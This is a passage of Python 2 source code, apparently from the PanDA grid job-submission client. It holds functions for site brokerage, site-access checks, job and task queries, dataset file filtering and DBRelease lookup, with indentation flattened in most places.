if status != 0 or re.search('Panda monitor and browser',out)==None:
return {}
# parse
parser = _monHTMLParser()
for line in out.split('\n'):
if re.search('Job Sets:',line) != None:
parser.feed( line )
break
return parser.getMap()
def isDirectAccess(site,usingRAW=False,usingTRF=False,usingARA=False):
# unknown site
if not PandaSites.has_key(site):
return False
# parse copysetup
params = PandaSites[site]['copysetup'].split('^')
# doesn't use special parameters
if len(params) < 5:
return False
# directIn
directIn = params[4]
if directIn != 'True':
return False
# xrootd uses local copy for RAW
newPrefix = params[2]
if newPrefix.startswith('root:'):
if usingRAW:
return False
# official TRF doesn't work with direct dcap/xrootd
if usingTRF and (not usingARA):
if newPrefix.startswith('root:') or newPrefix.startswith('dcap:') or \
newPrefix.startswith('dcache:') or newPrefix.startswith('gsidcap:'):
return False
# return
return True
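# Note on the copysetup convention assumed above: copysetup is a '^'-separated
# string where (0-based) field 2 is the TURL prefix and field 4 is the directIn
# flag, e.g. a hypothetical '...^...^root://xrd.example.org//^...^True' enables
# direct access except for the RAW/TRF special cases handled above.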
# run brokerage
def runBrokerage(sites,atlasRelease,cmtConfig=None,verbose=False,trustIS=False,cacheVer='',processingType='',
loggingFlag=False,memorySize=0,useDirectIO=False,siteGroup=None,maxCpuCount=-1,rootVer=''):
# use only directIO sites
nonDirectSites = []
if useDirectIO:
tmpNewSites = []
for tmpSite in sites:
if isDirectAccess(tmpSite):
tmpNewSites.append(tmpSite)
else:
nonDirectSites.append(tmpSite)
sites = tmpNewSites
if sites == []:
if not loggingFlag:
return 0,'ERROR : no candidate.'
else:
return 0,{'site':'ERROR : no candidate.','logInfo':[]}
# choose at most 50 sites randomly to avoid too many lookups
random.shuffle(sites)
sites = sites[:50]
# serialize
strSites = pickle.dumps(sites)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/runBrokerage'
data = {'sites':strSites,
'atlasRelease':atlasRelease}
if cmtConfig != None:
data['cmtConfig'] = cmtConfig
if trustIS:
data['trustIS'] = True
if maxCpuCount > 0:
data['maxCpuCount'] = maxCpuCount
if cacheVer != '':
# change format if needed
cacheVer = re.sub('^-','',cacheVer)
match = re.search('^([^_]+)_(\d+\.\d+\.\d+\.\d+\.*\d*)$',cacheVer)
if match != None:
cacheVer = '%s-%s' % (match.group(1),match.group(2))
else:
# nightlies
match = re.search('_(rel_\d+)$',cacheVer)
if match != None:
# use base release as cache version
cacheVer = '%s:%s' % (atlasRelease,match.group(1))
# use cache for brokerage
data['atlasRelease'] = cacheVer
# use ROOT ver
if rootVer != '' and data['atlasRelease'] == '':
data['atlasRelease'] = 'ROOT-%s' % rootVer
if processingType != '':
# set processingType mainly for HC
data['processingType'] = processingType
# enable logging
if loggingFlag:
data['loggingFlag'] = True
# memory size
if not memorySize in [-1,0,None,'NULL']:
data['memorySize'] = memorySize
# site group
if not siteGroup in [None,-1]:
data['siteGroup'] = siteGroup
status,output = curl.get(url,data)
try:
if not loggingFlag:
return status,output
else:
outputPK = pickle.loads(output)
# add directIO info
if nonDirectSites != []:
if not outputPK.has_key('logInfo'):
outputPK['logInfo'] = []
for tmpSite in nonDirectSites:
msgBody = 'action=skip site=%s reason=nondirect - not directIO site' % tmpSite
outputPK['logInfo'].append(msgBody)
return status,outputPK
except:
type, value, traceBack = sys.exc_info()
print output
print "ERROR runBrokerage : %s %s" % (type,value)
return EC_Failed,None
# run rebrokerage
def runReBrokerage(jobID,libDS='',cloud=None,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/runReBrokerage'
data = {'jobID':jobID}
if cloud != None:
data['cloud'] = cloud
if not libDS in ['',None,'NULL']:
data['libDS'] = libDS
retVal = curl.get(url,data)
# communication error
if retVal[0] != 0:
return retVal
# succeeded
if retVal[1] == True:
return 0,''
# server error
errMsg = retVal[1]
if errMsg.startswith('ERROR: '):
# remove ERROR:
errMsg = re.sub('ERROR: ','',errMsg)
return EC_Failed,errMsg
# retry failed jobs in Active
def retryFailedJobsInActive(jobID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/retryFailedJobsInActive'
data = {'jobID':jobID}
retVal = curl.get(url,data)
# communication error
if retVal[0] != 0:
return retVal
# succeeded
if retVal[1] == True:
return 0,''
# server error
errMsg = retVal[1]
if errMsg.startswith('ERROR: '):
# remove ERROR:
errMsg = re.sub('ERROR: ','',errMsg)
return EC_Failed,errMsg
# send brokerage log
def sendBrokerageLog(jobID,jobsetID,brokerageLogs,verbose):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
msgList = []
for tmpMsgBody in brokerageLogs:
if not jobsetID in [None,'NULL']:
tmpMsg = ' : jobset=%s jobdef=%s : %s' % (jobsetID,jobID,tmpMsgBody)
else:
tmpMsg = ' : jobdef=%s : %s' % (jobID,tmpMsgBody)
msgList.append(tmpMsg)
# execute
url = baseURLSSL + '/sendLogInfo'
data = {'msgType':'analy_brokerage',
'msgList':pickle.dumps(msgList)}
retVal = curl.post(url,data)
return True
# exclude long,xrootd,local queues
def isExcudedSite(tmpID):
excludedSite = False
for exWord in ['ANALY_LONG_','_LOCAL','_test']:
if re.search(exWord,tmpID,re.I) != None:
excludedSite = True
break
return excludedSite
# get default space token
def getDefaultSpaceToken(fqans,defaulttoken):
# mapping is not defined
if defaulttoken == '':
return ''
# loop over all groups
for tmpStr in defaulttoken.split(','):
# extract group and token
items = tmpStr.split(':')
if len(items) != 2:
continue
tmpGroup = items[0]
tmpToken = items[1]
# look for group
if re.search(tmpGroup+'/',fqans) != None:
return tmpToken
# not found
return ''
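# Worked example for getDefaultSpaceToken (group/token names are hypothetical):
#   getDefaultSpaceToken('/atlas/phys-higgs/Role=NULL',
#                        '/atlas/phys-higgs:GROUPDISK,/atlas/det-muon:MUONDISK')
# returns 'GROUPDISK' since the first group appears followed by '/' in the FQANs.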
# use dev server
def useDevServer():
global baseURL
baseURL = 'http://aipanda007.cern.ch:25080/server/panda'
global baseURLSSL
baseURLSSL = 'https://aipanda007.cern.ch:25443/server/panda'
global baseURLCSRV
baseURLCSRV = 'https://aipanda007.cern.ch:25443/server/panda'
global baseURLCSRVSSL
baseURLCSRVSSL = 'https://aipanda007.cern.ch:25443/server/panda'
global baseURLSUB
baseURLSUB = 'http://atlpan.web.cern.ch/atlpan'
# use INTR server
def useIntrServer():
global baseURL
baseURL = 'http://aipanda027.cern.ch:25080/server/panda'
global baseURLSSL
baseURLSSL = 'https://aipanda027.cern.ch:25443/server/panda'
# set server
def setServer(urls):
global baseURL
baseURL = urls.split(',')[0]
global baseURLSSL
baseURLSSL = urls.split(',')[-1]
# set cache server
def setCacheServer(urls):
global baseURLCSRV
baseURLCSRV = urls.split(',')[0]
global baseURLCSRVSSL
baseURLCSRVSSL = urls.split(',')[-1]
# register proxy key
def registerProxyKey(credname,origin,myproxy,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
curl.verifyHost = True
# execute
url = baseURLSSL + '/registerProxyKey'
data = {'credname': credname,
'origin' : origin,
'myproxy' : myproxy
}
return curl.post(url,data)
# get proxy key
def getProxyKey(verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getProxyKey'
status,output = curl.post(url,{})
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getProxyKey : %s %s" % (type,value)
return EC_Failed,None
# add site access
def addSiteAccess(siteID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/addSiteAccess'
data = {'siteID': siteID}
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR listSiteAccess : %s %s" % (type,value)
return EC_Failed,None
# list site access
def listSiteAccess(siteID,verbose=False,longFormat=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/listSiteAccess'
data = {}
if siteID != None:
data['siteID'] = siteID
if longFormat:
data['longFormat'] = True
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR listSiteAccess : %s %s" % (type,value)
return EC_Failed,None
# update site access
def updateSiteAccess(method,siteid,userName,verbose=False,value=''):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/updateSiteAccess'
data = {'method':method,'siteid':siteid,'userName':userName}
if value != '':
data['attrValue'] = value
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,output
except:
type, value, traceBack = sys.exc_info()
print "ERROR updateSiteAccess : %s %s" % (type,value)
return EC_Failed,None
# site access map
SiteAcessMapForWG = None
# add allowed sites
def addAllowedSites(verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug('check site access')
# get access list
global SiteAcessMapForWG
SiteAcessMapForWG = {}
tmpStatus,tmpOut = listSiteAccess(None,verbose,True)
if tmpStatus != 0:
return False
global PandaSites
for tmpVal in tmpOut:
tmpID = tmpVal['primKey']
# keep info to map
SiteAcessMapForWG[tmpID] = tmpVal
# set online if the site is allowed
if tmpVal['status']=='approved':
if PandaSites.has_key(tmpID):
if PandaSites[tmpID]['status'] in ['brokeroff']:
PandaSites[tmpID]['status'] = 'online'
if verbose:
tmpLog.debug('set %s online' % tmpID)
return True
# check permission
def checkSiteAccessPermission(siteName,workingGroup,verbose):
# get site access if needed
if SiteAcessMapForWG == None:
ret = addAllowedSites(verbose)
if not ret:
return True
# don't check if site name is undefined
if siteName == None:
return True
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug('checking site access permission')
tmpLog.debug('site=%s workingGroup=%s map=%s' % (siteName,workingGroup,str(SiteAcessMapForWG)))
# check
if (not SiteAcessMapForWG.has_key(siteName)) or SiteAcessMapForWG[siteName]['status'] != 'approved':
errStr = "You don't have permission to send jobs to %s with workingGroup=%s. " % (siteName,workingGroup)
# allowed member only
if PandaSites[siteName]['accesscontrol'] == 'grouplist':
tmpLog.error(errStr)
return False
else:
# reset workingGroup
if not workingGroup in ['',None]:
errStr += 'Resetting workingGroup to None'
tmpLog.warning(errStr)
return True
elif not workingGroup in ['',None]:
# check workingGroup
wgList = SiteAcessMapForWG[siteName]['workingGroups'].split(',')
if not workingGroup in wgList:
errStr = "Invalid workingGroup=%s. Must be one of %s. " % (workingGroup,str(wgList))
errStr += 'Resetting workingGroup to None'
tmpLog.warning(errStr)
return True
# no problems
return True
# get JobIDs in a time range
def getJobIDsInTimeRange(timeRange,dn=None,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getJobIDsInTimeRange'
data = {'timeRange':timeRange}
if dn != None:
data['dn'] = dn
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getJobIDsInTimeRange : %s %s" % (type,value)
return EC_Failed,None
# get JobIDs and jediTasks in a time range
def getJobIDsJediTasksInTimeRange(timeRange, dn=None, minTaskID=None, verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getJediTasksInTimeRange'
data = {'timeRange': timeRange,
'fullFlag': True}
if dn != None:
data['dn'] = dn
if minTaskID is not None:
data['minTaskID'] = minTaskID
status,output = curl.post(url,data)
if status!=0:
print output
return status, None
try:
jediTaskDicts = pickle.loads(output)
return 0, jediTaskDicts
except:
type, value, traceBack = sys.exc_info()
print "ERROR getJediTasksInTimeRange : %s %s" % (type,value)
return EC_Failed, None
# get details of jedi task
def getJediTaskDetails(taskDict,fullFlag,withTaskInfo,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getJediTaskDetails'
data = {'jediTaskID':taskDict['jediTaskID'],
'fullFlag':fullFlag,
'withTaskInfo':withTaskInfo}
status,output = curl.post(url,data)
if status != 0:
print output
return status,None
try:
tmpDict = pickle.loads(output)
# server error
if tmpDict == {}:
print "ERROR getJediTaskDetails got empty"
return EC_Failed,None
# copy
for tmpKey,tmpVal in tmpDict.iteritems():
taskDict[tmpKey] = tmpVal
return 0,taskDict
except:
errType,errValue = sys.exc_info()[:2]
print "ERROR getJediTaskDetails : %s %s" % (errType,errValue)
return EC_Failed,None
# get PandaIDs for a JobID
def getPandIDsWithJobID(jobID,dn=None,nJobs=0,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getPandIDsWithJobID'
data = {'jobID':jobID, 'nJobs':nJobs}
if dn != None:
data['dn'] = dn
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getPandIDsWithJobID : %s %s" % (type,value)
return EC_Failed,None
# check merge job generation for a JobID
def checkMergeGenerationStatus(jobID,dn=None,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/checkMergeGenerationStatus'
data = {'jobID':jobID}
if dn != None:
data['dn'] = dn
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR checkMergeGenerationStatus : %s %s" % (type,value)
return EC_Failed,None
# get full job status
def getFullJobStatus(ids,verbose):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getFullJobStatus'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getFullJobStatus : %s %s" % (type,value)
return EC_Failed,None
# get slimmed file info
def getSlimmedFileInfoPandaIDs(ids,verbose):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getSlimmedFileInfoPandaIDs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getSlimmedFileInfoPandaIDs : %s %s" % (type,value)
return EC_Failed,None
# get input files currently in use for analysis
def getFilesInUseForAnal(outDataset,verbose):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getDisInUseForAnal'
data = {'outDataset':outDataset}
status,output = curl.post(url,data)
try:
inputDisList = pickle.loads(output)
# failed
if inputDisList == None:
print "ERROR getFilesInUseForAnal : failed to get shadow dis list from the panda server"
sys.exit(EC_Failed)
# split to small chunks to avoid timeout
retLFNs = []
nDis = 3
iDis = 0
while iDis < len(inputDisList):
# serialize
strInputDisList = pickle.dumps(inputDisList[iDis:iDis+nDis])
# get LFNs
url = baseURLSSL + '/getLFNsInUseForAnal'
data = {'inputDisList':strInputDisList}
status,output = curl.post(url,data)
tmpLFNs = pickle.loads(output)
if tmpLFNs == None:
print "ERROR getFilesInUseForAnal : failed to get LFNs in shadow dis from the panda server"
sys.exit(EC_Failed)
retLFNs += tmpLFNs
iDis += nDis
time.sleep(1)
return retLFNs
except:
type, value, traceBack = sys.exc_info()
print "ERROR getFilesInUseForAnal : %s %s" % (type,value)
sys.exit(EC_Failed)
# set debug mode
def setDebugMode(pandaID,modeOn,verbose):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/setDebugMode'
data = {'pandaID':pandaID,'modeOn':modeOn}
status,output = curl.post(url,data)
try:
return status,output
except:
type, value = sys.exc_info()[:2]
errStr = "setDebugMode failed with %s %s" % (type,value)
return EC_Failed,errStr
# set tmp dir
def setGlobalTmpDir(tmpDir):
global globalTmpDir
globalTmpDir = tmpDir
# exclude site
def excludeSite(excludedSiteList,origFullExecString='',infoList=[]):
if excludedSiteList == []:
return
# decompose
excludedSite = []
for tmpItemList in excludedSiteList:
for tmpItem in tmpItemList.split(','):
if tmpItem != '' and not tmpItem in excludedSite:
excludedSite.append(tmpItem)
# get list of original excludedSites
origExcludedSite = []
if origFullExecString != '':
# extract original excludedSite
origFullExecString = urllib.unquote(origFullExecString)
matchItr = re.finditer('--excludedSite\s*=*([^ "]+)',origFullExecString)
for match in matchItr:
origExcludedSite += match.group(1).split(',')
else:
# use excludedSite since this is the first loop
origExcludedSite = excludedSite
# remove empty
if '' in origExcludedSite:
origExcludedSite.remove('')
# sites composed of long/short queues
compSites = ['CERN','LYON','BNL']
# remove sites
global PandaSites
for tmpPatt in excludedSite:
# skip empty
if tmpPatt == '':
continue
# check if the user specified this site pattern
userSpecified = False
if tmpPatt in origExcludedSite:
userSpecified = True
# check if it is a composite
for tmpComp in compSites:
if tmpComp in tmpPatt:
# use generic ID to remove all queues
tmpPatt = tmpComp
break
sites = PandaSites.keys()
for site in sites:
# look for pattern
if tmpPatt in site:
try:
# add brokerage info
if userSpecified and PandaSites[site]['status'] == 'online' and not isExcudedSite(site):
msgBody = 'action=exclude site=%s reason=useroption - excluded by user' % site
if not msgBody in infoList:
infoList.append(msgBody)
PandaSites[site]['status'] = 'excluded'
else:
# already used by previous submission cycles
PandaSites[site]['status'] = 'panda_excluded'
except:
pass
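
# Illustrative sketch (added example): comma-separated patterns are decomposed,
# matched as plain substrings against Panda site names, and composite sites
# (CERN/LYON/BNL) are widened to the generic ID so all of their queues are
# removed. Assumes PandaSites has been populated; the patterns are hypothetical.
def _exampleExcludeSite():
    excludeSite(['ANALY_FOO,CERN'])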
# use certain sites
def useCertainSites(sitePat):
if re.search(',',sitePat) == None:
return sitePat,[]
# remove sites
global PandaSites
sites = PandaSites.keys()
cloudsForRandom = []
for site in sites:
# look for pattern
useThisSite = False
for tmpPatt in sitePat.split(','):
if tmpPatt in site:
useThisSite = True
break
# delete
if not useThisSite:
PandaSites[site]['status'] = 'skip'
else:
if not PandaSites[site]['cloud'] in cloudsForRandom:
cloudsForRandom.append(PandaSites[site]['cloud'])
# return
return 'AUTO',cloudsForRandom
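
# Illustrative sketch (added example): with a comma in the pattern the matching
# sites stay usable, every other site is set to 'skip', and ('AUTO', clouds) is
# returned so the brokerage chooses among the surviving clouds. Assumes
# PandaSites has been populated; the site names are hypothetical.
def _exampleUseCertainSites():
    newSite, clouds = useCertainSites('ANALY_FOO,ANALY_BAR')
    return newSite, clouds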
# get client version
def getPandaClientVer(verbose):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getPandaClientVer'
status,output = curl.get(url,{})
# failed
if status != 0:
return status,output
# check format
if re.search('^\d+\.\d+\.\d+$',output) == None:
return EC_Failed,"invalid version '%s'" % output
# return
return status,output
# get list of cache prefix
def getCachePrefixes(verbose):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getCachePrefixes'
status,output = curl.get(url,{})
# failed
if status != 0:
print output
# get logger
tmpLog = PLogger.getPandaLogger()
errStr = "cannot get the list of Athena projects"
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return
try:
tmpList = pickle.loads(output)
tmpList.append('AthAnalysisBase')
return tmpList
except:
print output
errType,errValue = sys.exc_info()[:2]
print "ERROR: getCachePrefixes : %s %s" % (errType,errValue)
sys.exit(EC_Failed)
# get list of cmtConfig
def getCmtConfigList(athenaVer,verbose):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getCmtConfigList'
data = {}
data['relaseVer'] = athenaVer
status,output = curl.get(url,data)
# failed
if status != 0:
print output
# get logger
tmpLog = PLogger.getPandaLogger()
errStr = "cannot get the list of cmtconfig for %s" % athenaVer
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return
try:
return pickle.loads(output)
except:
print output
errType,errValue = sys.exc_info()[:2]
print "ERROR: getCmtConfigList : %s %s" % (errType,errValue)
sys.exit(EC_Failed)
# get files in dataset with filter
def getFilesInDatasetWithFilter(inDS,filter,shadowList,inputFileListName,verbose,dsStringFlag=False,isRecursive=False,
antiFilter='',notSkipLog=False):
# get logger
tmpLog = PLogger.getPandaLogger()
# query files in dataset
if not isRecursive or verbose:
tmpLog.info("query files in %s" % inDS)
if dsStringFlag:
inputFileMap,inputDsString = queryFilesInDataset(inDS,verbose,getDsString=True)
else:
inputFileMap = queryFilesInDataset(inDS,verbose)
# read list of files to be used
filesToBeUsed = []
if inputFileListName != '':
rFile = open(inputFileListName)
for line in rFile:
line = re.sub('\n','',line)
line = line.strip()
if line != '':
filesToBeUsed.append(line)
rFile.close()
# get list of filters
filters = []
if filter != '':
filters = filter.split(',')
antifilters = []
if antiFilter != '':
antifilters = antiFilter.split(',')
# remove redundant files
tmpKeys = inputFileMap.keys()
filesPassFilter = []
for tmpLFN in tmpKeys:
# remove log
if not notSkipLog:
if re.search('\.log(\.tgz)*(\.\d+)*$',tmpLFN) != None or \
re.search('\.log(\.\d+)*(\.tgz)*$',tmpLFN) != None:
del inputFileMap[tmpLFN]
continue
# filename matching
if filter != '':
matchFlag = False
for tmpFilter in filters:
if re.search(tmpFilter,tmpLFN) != None:
matchFlag = True
break
if not matchFlag:
del inputFileMap[tmpLFN]
continue
# anti matching
if antiFilter != '':
antiMatchFlag = False
for tmpFilter in antifilters:
if re.search(tmpFilter,tmpLFN) != None:
antiMatchFlag = True
break
if antiMatchFlag:
del inputFileMap[tmpLFN]
continue
# files to be used
if filesToBeUsed != []:
# check matching
matchFlag = False
for pattern in filesToBeUsed:
# normal matching
if pattern == tmpLFN:
matchFlag = True
break
# doesn't match
if not matchFlag:
del inputFileMap[tmpLFN]
continue
# files which pass the matching filters
filesPassFilter.append(tmpLFN)
# files in shadow
if tmpLFN in shadowList:
if inputFileMap.has_key(tmpLFN):
del inputFileMap[tmpLFN]
continue
# no files in filelist are available
if inputFileMap == {} and (filter != '' or antiFilter != '' or inputFileListName != '') and filesPassFilter == []:
if inputFileListName != '':
errStr = "Files specified in %s are unavailable in %s. " % (inputFileListName,inDS)
elif filter != '':
errStr = "Files matching with %s are unavailable in %s. " % (filters,inDS)
else:
errStr = "Files unmatching with %s are unavailable in %s. " % (antifilters,inDS)
errStr += "Make sure that you specify correct file names or matching patterns"
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return
if dsStringFlag:
return inputFileMap,inputDsString
return inputFileMap
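
# Illustrative sketch (added example): filter/antiFilter are comma-separated
# regexps applied to each LFN, and log files are skipped unless notSkipLog is
# set. The dataset name and patterns are hypothetical, and a working grid
# environment is needed for the underlying dataset query.
def _exampleFilteredFiles():
    return getFilesInDatasetWithFilter('user.someone.mydataset/', 'AOD', [], '',
                                       False, antiFilter='debug')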
# check if DQ2-free site
def isDQ2free(site):
if PandaSites.has_key(site) and PandaSites[site]['ddm'] == 'local':
return True
return False
# check queued analysis jobs at a site
def checkQueuedAnalJobs(site,verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getQueuedAnalJobs'
data = {'site':site}
status,output = curl.post(url,data)
try:
# get queued analysis
queuedMap = pickle.loads(output)
if queuedMap.has_key('running') and queuedMap.has_key('queued'):
if queuedMap['running'] > 20 and queuedMap['queued'] > 2 * queuedMap['running']:
warStr = 'Your job might be delayed since %s is busy. ' % site
warStr += 'There are %s jobs already queued by other users while %s jobs are running. ' \
% (queuedMap['queued'],queuedMap['running'])
warStr += 'Please consider replicating the input dataset to a free site '
warStr += 'or avoiding the --site/--cloud option so that the brokerage will '
warStr += 'find a free site'
tmpLog.warning(warStr)
except:
type, value, traceBack = sys.exc_info()
tmpLog.error("checkQueuedAnalJobs %s %s" % (type,value))
# request EventPicking
def requestEventPicking(eventPickEvtList,eventPickDataType,eventPickStreamName,
eventPickDS,eventPickAmiTag,fileList,fileListName,outDS,
lockedBy,params,eventPickNumSites,eventPickWithGUID,ei_api,
verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
# list of input files
strInput = ''
for tmpInput in fileList:
if tmpInput != '':
strInput += '%s,' % tmpInput
if fileListName != '':
for tmpLine in open(fileListName):
tmpInput = re.sub('\n','',tmpLine)
if tmpInput != '':
strInput += '%s,' % tmpInput
strInput = strInput[:-1]
# make dataset name
userDatasetName = '%s.%s.%s/' % tuple(outDS.split('.')[:2]+[MiscUtils.wrappedUuidGen()])
# open run/event number list
evpFile = open(eventPickEvtList)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/putEventPickingRequest'
data = {'runEventList' : evpFile.read(),
'eventPickDataType' : eventPickDataType,
'eventPickStreamName' : eventPickStreamName,
'eventPickDS' : eventPickDS,
'eventPickAmiTag' : eventPickAmiTag,
'userDatasetName' : userDatasetName,
'lockedBy' : lockedBy,
'giveGUID' : eventPickWithGUID,
'params' : params,
'inputFileList' : strInput,
}
if eventPickNumSites > 1:
data['eventPickNumSites'] = eventPickNumSites
if ei_api:
data['ei_api'] = ei_api
evpFile.close()
status,output = curl.post(url,data)
# failed
if status != 0 or output != True:
print output
errStr = "failed to request EventPicking"
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return user dataset name
return True,userDatasetName
# check if enough sites have DBR
def checkEnoughSitesHaveDBR(dq2IDs):
# collect sites corresponding to DQ2 IDs
sitesWithDBR = []
for tmpDQ2ID in dq2IDs:
tmpPandaSiteList = convertDQ2toPandaIDList(tmpDQ2ID)
for tmpPandaSite in tmpPandaSiteList:
if PandaSites.has_key(tmpPandaSite) and PandaSites[tmpPandaSite]['status'] == 'online':
if isExcudedSite(tmpPandaSite):
continue
sitesWithDBR.append(tmpPandaSite)
# count the number of online sites with DBR
nOnline = 0
nOnlineWithDBR = 0
nOnlineT1 = 0
nOnlineT1WithDBR = 0
for tmpPandaSite,tmpSiteStat in PandaSites.iteritems():
if tmpSiteStat['status'] == 'online':
# exclude test,long,local
if isExcudedSite(tmpPandaSite):
continue
# DQ2 free
if tmpSiteStat['ddm'] == 'local':
continue
nOnline += 1
if tmpPandaSite in PandaTier1Sites:
nOnlineT1 += 1
if tmpPandaSite in sitesWithDBR or tmpSiteStat['iscvmfs'] == True:
nOnlineWithDBR += 1
# count T1 sites that hold the DBR on disk
if tmpPandaSite in PandaTier1Sites and tmpPandaSite in sitesWithDBR:
nOnlineT1WithDBR += 1
# enough replicas
if nOnlineWithDBR < 10:
return False
# threshold 90%
if float(nOnlineWithDBR) < 0.9 * float(nOnline):
return False
# not all T1s have the DBR
if nOnlineT1 != nOnlineT1WithDBR:
return False
# all OK
return True
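
# Worked example (added, with made-up counts) mirroring the three acceptance
# conditions above: at least 10 replicas, at least 90% of online sites, and
# every online T1 holding the DBR.
def _exampleDbrThresholds(nOnline, nOnlineWithDBR, nOnlineT1, nOnlineT1WithDBR):
    # _exampleDbrThresholds(100, 92, 10, 10) -> True
    # _exampleDbrThresholds(100, 85, 10, 10) -> False, below the 90% threshold
    return nOnlineWithDBR >= 10 and \
           float(nOnlineWithDBR) >= 0.9 * float(nOnline) and \
           nOnlineT1 == nOnlineT1WithDBR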
# get latest DBRelease
def getLatestDBRelease(verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
tmpLog.info('trying to get the latest version number for DBRelease=LATEST')
# get ddo datasets
ddoDatasets = getDatasets('ddo.*',verbose,True,onlyNames=True)
if ddoDatasets == {}:
tmpLog.error('failed to get a list of DBRelease datasets from DQ2')
sys.exit(EC_Failed)
# reverse sort to avoid redundant lookup
ddoDatasets = ddoDatasets.keys()
ddoDatasets.sort()
ddoDatasets.reverse()
# extract version number
latestVerMajor = 0
latestVerMinor = 0
latestVerBuild = 0
latestVerRev = 0
latestDBR = ''
for tmpName in ddoDatasets:
# ignore CDRelease
if ".CDRelease." in tmpName:
continue
# ignore user
if tmpName.startswith('ddo.user'):
continue
# use Atlas.Ideal
if not ".Atlas.Ideal." in tmpName:
continue
match = re.search('\.v(\d+)(_*[^\.]*)$',tmpName)
if match == None:
tmpLog.warning('cannot extract version number from %s' % tmpName)
continue
# ignore special DBRs
if match.group(2) != '':
continue
# get major,minor,build,revision numbers
tmpVerStr = match.group(1)
tmpVerMajor = 0
tmpVerMinor = 0
tmpVerBuild = 0
tmpVerRev = 0
try:
tmpVerMajor = int(tmpVerStr[0:2])
except:
pass
try:
tmpVerMinor = int(tmpVerStr[2:4])
except:
pass
try:
tmpVerBuild = int(tmpVerStr[4:6])
except:
pass
try:
tmpVerRev = int(tmpVerStr[6:])
except:
pass
# compare
if latestVerMajor > tmpVerMajor:
continue
elif latestVerMajor == tmpVerMajor:
if latestVerMinor > tmpVerMinor:
continue
elif latestVerMinor == tmpVerMinor:
if latestVerBuild > tmpVerBuild:
continue
elif latestVerBuild == tmpVerBuild:
if latestVerRev > tmpVerRev:
continue
